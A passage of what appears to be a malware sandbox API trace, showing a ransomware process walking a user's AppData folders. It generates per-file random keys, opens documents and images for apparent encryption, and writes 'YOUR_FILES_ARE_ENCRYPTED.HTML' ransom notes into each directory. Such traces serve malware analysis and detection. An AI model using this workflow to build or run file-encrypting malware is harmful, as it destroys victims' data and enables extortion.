returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates" [0165.585] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\*" [0165.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe2d91420, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e484e0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e484e0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.586] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe2d91420, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e484e0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e484e0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.586] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1c7f460, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4611, dwReserved0=0x0, dwReserved1=0x60, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0165.586] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 71 [0165.586] lstrcmpW (lpString1="Normal.dotm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.586] PathFindExtensionW (pszPath="Normal.dotm") returned=".dotm" [0165.586] lstrlenW (lpString=".dotm") returned 5 [0165.586] PathFindExtensionW (pszPath="Normal.dotm") returned=".dotm" [0165.586] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0165.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.587] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=17937) returned 1 [0165.587] GetProcessHeap () returned 0x270000 [0165.587] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.588] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="EA") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="E8") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="BA") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="17") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="6D") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="08") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="45") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E2") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="16") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="6C") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="70") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="55") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="67") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="DE") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="66") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="95") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="1C") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="45") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="C7") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="2A") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="D6") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="29") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="15") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="47") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="E8") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="FE") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="D8") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="18") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="AE") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="92") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="D6") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="62") returned 2 [0165.589] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" [0165.589] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.589] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.590] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1c7f460, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4611, dwReserved0=0x0, dwReserved1=0x60, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 0 [0165.590] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.591] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0165.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\templates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.614] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.616] CloseHandle (hObject=0x5e4) returned 1 [0165.630] GetProcessHeap () returned 0x270000 [0165.631] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0165.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0165.633] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word") returned 54 [0165.633] GetProcessHeap () returned 0x270000 [0165.633] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.633] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word" [0165.633] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\*" [0165.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.634] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.634] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0165.634] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 62 [0165.634] GetProcessHeap () returned 0x270000 [0165.634] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.634] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0165.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0165.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.635] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.635] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.635] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.635] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0165.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\word\\startup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.636] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.638] CloseHandle (hObject=0x5e4) returned 1 [0165.638] GetProcessHeap () returned 0x270000 [0165.640] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.640] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0165.640] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.640] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0165.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\word\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.640] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.643] CloseHandle (hObject=0x5b8) returned 1 [0165.643] GetProcessHeap () returned 0x270000 [0165.644] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.644] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0165.644] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0165.644] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0165.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0165.645] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0165.647] CloseHandle (hObject=0x598) returned 1 [0165.648] GetProcessHeap () returned 0x270000 [0165.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.653] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94e0d3e0, ftCreationTime.dwHighDateTime=0x1d7e1ed, ftLastAccessTime.dwLowDateTime=0x97a15400, ftLastAccessTime.dwHighDateTime=0x1d7e4cd, ftLastWriteTime.dwLowDateTime=0x97a15400, ftLastWriteTime.dwHighDateTime=0x1d7e4cd, nFileSizeHigh=0x0, nFileSizeLow=0x6187, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ndlbiyE.jpg", cAlternateFileName="")) returned 1 [0165.653] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg") returned 51 [0165.653] lstrcmpW (lpString1="ndlbiyE.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.653] PathFindExtensionW (pszPath="ndlbiyE.jpg") returned=".jpg" [0165.653] lstrlenW (lpString=".jpg") returned 4 [0165.653] PathFindExtensionW (pszPath="ndlbiyE.jpg") returned=".jpg" [0165.653] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ndlbiye.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.654] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=24967) returned 1 [0165.654] GetProcessHeap () returned 0x270000 [0165.654] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.657] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="64") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="6A") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="93") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="09") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FC") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="98") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="04") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="5B") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A1") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="21") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A9") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="38") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="27") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="2D") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C8") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B0") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BE") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="05") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="FC") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="88") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="11") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="53") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="15") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="E4") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="97") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="90") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="63") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="71") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="0D") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="30") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="63") returned 2 [0165.659] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg" [0165.659] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.659] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.659] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b3635c0, ftCreationTime.dwHighDateTime=0x1d7da54, ftLastAccessTime.dwLowDateTime=0x6013b8d0, ftLastAccessTime.dwHighDateTime=0x1d7dd01, ftLastWriteTime.dwLowDateTime=0x6013b8d0, ftLastWriteTime.dwHighDateTime=0x1d7dd01, nFileSizeHigh=0x0, nFileSizeLow=0xd106, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NdW9Nqmyx.bmp", cAlternateFileName="NDW9NQ~1.BMP")) returned 1 [0165.659] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\NdW9Nqmyx.bmp") returned 53 [0165.659] lstrcmpW 